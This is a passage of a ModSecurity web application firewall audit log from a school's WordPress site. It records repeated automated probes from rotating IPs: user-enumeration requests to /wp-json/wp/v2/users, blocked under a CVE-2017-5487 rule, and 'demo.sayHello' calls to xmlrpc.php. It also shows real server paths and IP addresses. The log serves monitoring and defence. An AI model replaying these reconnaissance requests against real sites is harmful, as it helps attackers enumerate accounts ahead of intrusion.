smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870f372c-C-- demo.sayHello --870f372c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870f372c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459634855465 5333 (- - -) Stopwatch2: 1746459634855465 5333; combined=4005, p1=501, p2=3295, p3=29, p4=30, p5=88, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870f372c-Z-- --dc72f267-A-- [05/May/2025:22:40:36 +0700] aBjb9ARwKNFSM6B7_LacDAAAAIY 103.236.140.4 57552 103.236.140.4 8181 --dc72f267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc72f267-C-- demo.sayHello --dc72f267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc72f267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459636578468 4608 (- - -) Stopwatch2: 1746459636578468 4608; combined=3624, p1=426, p2=3004, p3=22, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc72f267-Z-- --1846586f-A-- [05/May/2025:22:40:43 +0700] aBjb-4ZWvR7-42f6JrAHtAAAANA 103.236.140.4 57624 103.236.140.4 8181 --1846586f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1846586f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1846586f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459643824757 2516 (- - -) Stopwatch2: 1746459643824757 2516; combined=1470, p1=476, p2=962, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1846586f-Z-- --d271693b-A-- [05/May/2025:22:40:45 +0700] aBjb_YZWvR7-42f6JrAHtwAAANM 103.236.140.4 57632 103.236.140.4 8181 --d271693b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d271693b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d271693b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459645225914 1923 (- - -) Stopwatch2: 1746459645225914 1923; combined=1002, p1=330, p2=646, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d271693b-Z-- --50a0dc3f-A-- [05/May/2025:22:40:46 +0700] aBjb_oZWvR7-42f6JrAHugAAAMc 103.236.140.4 57646 103.236.140.4 8181 --50a0dc3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50a0dc3f-C-- demo.sayHello --50a0dc3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a0dc3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459646551618 6232 (- - -) Stopwatch2: 1746459646551618 6232; combined=4386, p1=523, p2=3605, p3=34, p4=35, p5=109, sr=86, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a0dc3f-Z-- --72f44b31-A-- [05/May/2025:22:40:47 +0700] aBjb__ZJDMuQndL03JNWxgAAAE8 103.236.140.4 57656 103.236.140.4 8181 --72f44b31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --72f44b31-C-- demo.sayHello --72f44b31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f44b31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459647957369 5163 (- - -) Stopwatch2: 1746459647957369 5163; combined=3799, p1=447, p2=3140, p3=25, p4=28, p5=92, sr=70, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f44b31-Z-- --298bcd6f-A-- [05/May/2025:22:40:54 +0700] aBjcBk2V_h1VFAgsfgZ4GQAAAA8 103.236.140.4 57720 103.236.140.4 8181 --298bcd6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --298bcd6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --298bcd6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459654108687 3522 (- - -) Stopwatch2: 1746459654108687 3522; combined=1578, p1=560, p2=987, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298bcd6f-Z-- --6033b536-A-- [05/May/2025:22:40:56 +0700] aBjcCE2V_h1VFAgsfgZ4HgAAAAE 103.236.140.4 57744 103.236.140.4 8181 --6033b536-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6033b536-C-- demo.sayHello --6033b536-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6033b536-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459656843999 5725 (- - -) Stopwatch2: 1746459656843999 5725; combined=4179, p1=527, p2=3391, p3=32, p4=36, p5=125, sr=88, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6033b536-Z-- --0979d848-A-- [05/May/2025:22:41:05 +0700] aBjcEfZJDMuQndL03JNW1QAAAEI 103.236.140.4 57816 103.236.140.4 8181 --0979d848-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0979d848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0979d848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459665684074 3215 (- - -) Stopwatch2: 1746459665684074 3215; combined=1436, p1=498, p2=907, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0979d848-Z-- --c6d2ef13-A-- [05/May/2025:22:41:06 +0700] aBjcEoZWvR7-42f6JrAHxwAAAMc 103.236.140.4 57826 103.236.140.4 8181 --c6d2ef13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6d2ef13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6d2ef13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459666783514 3661 (- - -) Stopwatch2: 1746459666783514 3661; combined=1650, p1=512, p2=1094, p3=0, p4=0, p5=44, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6d2ef13-Z-- --087c470d-A-- [05/May/2025:22:41:08 +0700] aBjcFARwKNFSM6B7_LacHAAAAJg 103.236.140.4 57844 103.236.140.4 8181 --087c470d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --087c470d-C-- demo.sayHello --087c470d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --087c470d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459668408802 5240 (- - -) Stopwatch2: 1746459668408802 5240; combined=3969, p1=540, p2=3211, p3=30, p4=32, p5=93, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087c470d-Z-- --a1a53d69-A-- [05/May/2025:22:41:09 +0700] aBjcFU2V_h1VFAgsfgZ4JwAAAAo 103.236.140.4 57858 103.236.140.4 8181 --a1a53d69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a1a53d69-C-- demo.sayHello --a1a53d69-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1a53d69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459669560750 5391 (- - -) Stopwatch2: 1746459669560750 5391; combined=4180, p1=556, p2=3399, p3=33, p4=31, p5=94, sr=130, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1a53d69-Z-- --6423310c-A-- [05/May/2025:22:41:13 +0700] aBjcGYZWvR7-42f6JrAHzgAAANg 103.236.140.4 57904 103.236.140.4 8181 --6423310c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6423310c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6423310c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459673607578 2311 (- - -) Stopwatch2: 1746459673607578 2311; combined=1259, p1=399, p2=830, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6423310c-Z-- --c8c55e60-A-- [05/May/2025:22:41:16 +0700] aBjcHE2V_h1VFAgsfgZ4LQAAAAQ 103.236.140.4 57928 103.236.140.4 8181 --c8c55e60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8c55e60-C-- demo.sayHello --c8c55e60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c55e60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459676384897 5821 (- - -) Stopwatch2: 1746459676384897 5821; combined=4289, p1=561, p2=3468, p3=32, p4=35, p5=124, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c55e60-Z-- --382ca471-A-- [05/May/2025:22:41:46 +0700] aBjcOvZJDMuQndL03JNW4wAAAEs 103.236.140.4 58176 103.236.140.4 8181 --382ca471-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --382ca471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --382ca471-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459706224904 2706 (- - -) Stopwatch2: 1746459706224904 2706; combined=1172, p1=457, p2=690, p3=0, p4=0, p5=25, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --382ca471-Z-- --7e60d84e-A-- [05/May/2025:22:41:49 +0700] aBjcPU2V_h1VFAgsfgZ4QAAAABc 103.236.140.4 58208 103.236.140.4 8181 --7e60d84e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.114 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e60d84e-C-- demo.sayHello --7e60d84e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e60d84e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459709012976 6337 (- - -) Stopwatch2: 1746459709012976 6337; combined=4928, p1=669, p2=4013, p3=38, p4=43, p5=98, sr=140, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e60d84e-Z-- --96965d0a-A-- [05/May/2025:22:41:52 +0700] aBjcQE2V_h1VFAgsfgZ4SQAAAAg 103.236.140.4 58260 103.236.140.4 8181 --96965d0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96965d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96965d0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459712714268 2427 (- - -) Stopwatch2: 1746459712714268 2427; combined=1228, p1=384, p2=815, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 